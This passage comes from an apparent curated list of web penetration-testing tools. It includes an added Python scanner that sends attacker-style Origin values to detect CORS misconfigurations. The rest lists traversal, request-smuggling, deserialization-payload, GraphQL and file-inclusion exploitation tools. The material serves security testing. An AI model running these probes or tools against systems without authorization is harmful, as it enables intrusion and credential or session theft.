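The CORS scanners listed above all make the same check: replay a request with several attacker-controlled Origin values and grade the reply from Access-Control-Allow-Origin and Access-Control-Allow-Credentials. The following is an added example of that check, not code from Corsy, CORStest, cors-scanner or CorsMe. `fake_server` is a constructed stand-in for the HTTP layer that models one common bug, an unanchored suffix match on "example.com" plus trust of the "null" origin; replace it with a real client that returns the response headers as a dict to probe a live host.

```python
"""Origin-reflection probes (added example, not code from the listed scanners)."""


def fake_server(origin):
    """Constructed vulnerable policy: trusts any https Origin ending in example.com, and null."""
    if origin == "null" or (origin.startswith("https://") and origin.endswith("example.com")):
        return {"Access-Control-Allow-Origin": origin,
                "Access-Control-Allow-Credentials": "true"}
    return {}


def probe_origins(host):
    """Origins an attacker can actually present, keyed by the policy bug each one tests."""
    return {
        "arbitrary": "https://evil.invalid",          # allow-all with credentials
        "suffix": f"https://evil{host}",              # endswith(host) with no leading dot
        "prefix": f"https://{host}.evil.invalid",     # startswith(trusted host)
        "null": "null",                               # sandboxed iframe / data: URL origin
        "subdomain": f"https://cors-probe.{host}",    # blanket trust of all subdomains
    }


def grade(probe, origin, headers):
    """Severity of one reply; ACAO must echo *our* origin to be attacker-controlled."""
    acao = headers.get("Access-Control-Allow-Origin")
    creds = headers.get("Access-Control-Allow-Credentials", "").lower() == "true"
    if acao is None:
        return "none"
    if acao == "*":
        return "low"            # browsers refuse to send credentials with a wildcard
    if acao != origin:
        return "none"           # fixed allow-list value, not under our control
    if not creds:
        return "low"            # reflected, but only non-credentialed reads
    if probe == "subdomain":
        return "medium"         # needs XSS on, or takeover of, some subdomain first
    return "high"


def scan(host, fetch_headers):
    """Return {probe: {"origin": ..., "severity": ...}} for every origin variant."""
    return {name: {"origin": origin,
                   "severity": grade(name, origin, fetch_headers(origin))}
            for name, origin in probe_origins(host).items()}


if __name__ == "__main__":
    for name, r in scan("example.com", fake_server).items():
        print(f"{r['severity']:6} {name:10} Origin: {r['origin']}")
```

On a live target send the probes with the victim's cookies or Authorization header attached, since many apps only emit CORS headers on authenticated responses, and check for `Vary: Origin`; a reflected origin on a cacheable response can poison the cache for other users even when credentials are not allowed.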

Directory Traversal
- dotdotpwn: the directory traversal fuzzer.
- FDsploit: file inclusion and directory traversal fuzzing, enumeration and exploitation tool.
- off-by-slash: Burp extension to detect alias traversal via NGINX misconfiguration at scale.
- liffier: tired of manually adding dot-dot-slash to your possible path traversal? This short snippet increments ../ on the URL.

Request Smuggling
- http-request-smuggling: HTTP request smuggling detection tool.
- smuggler: HTTP request smuggling / desync testing tool written in Python 3.
- h2csmuggler: HTTP request smuggling over HTTP/2 cleartext (h2c).
- tiscripts: scripts the author uses to create request smuggling desync payloads for CL.TE and TE.CL style attacks.

Race Condition
- razzer: kernel fuzzer focusing on race bugs.
- racepwn: race condition framework.
- requests-racer: small Python library that makes it easy to exploit race conditions in web apps with Requests.
- turbo-intruder: Burp Suite extension for sending large numbers of HTTP requests and analyzing the results.
- race-the-web: tests for race conditions in web applications; includes a RESTful API to integrate into a continuous integration pipeline.

Source: Hacking Articles (@hackinarticles), https://github.com/Ignitetechnologies, https://in.linkedin.com/company/hackingarticles

Open Redirect
- Oralyzer: open redirection analyzer.
- Injectus: CRLF and open redirect fuzzer.
- dom-red: small script to check a list of domains for open redirect vulnerabilities.
- OpenRedireX: fuzzer for open redirect issues.

Insecure Direct Object References
- Autorize: automatic authorization enforcement detection extension for Burp Suite, written in Jython, developed by Barak Tawily.

Insecure Deserialization
- ysoserial: proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
- GadgetProbe: probes endpoints consuming Java serialized objects to identify classes, libraries and library versions on remote Java classpaths.
- ysoserial.net: deserialization payload generator for a variety of .NET formatters.
- phpggc: PHPGGC is a library of PHP unserialize() payloads along with a tool to generate them, from the command line or programmatically.

Header Injection
- headi: customisable and automated HTTP header injection.

GraphQL Injection
- inql: Burp extension for GraphQL security testing.
- GraphQLmap: scripting engine to interact with a GraphQL endpoint for pentesting purposes.
- shapeshifter: GraphQL security testing tool.
- graphql_beautifier: Burp Suite extension to make GraphQL requests more readable.
- clairvoyance: obtain a GraphQL API schema despite disabled introspection.

File Inclusion
- liffy: local file inclusion exploitation tool.
- Burp-LFI-tests: fuzzing for LFI using Burp Suite.
- LFI-Enum: scripts to execute enumeration via LFI.
- LFISuite: totally automatic LFI exploiter (+ reverse shell) and scanner.
- LFI-files: wordlist to brute-force for LFI.
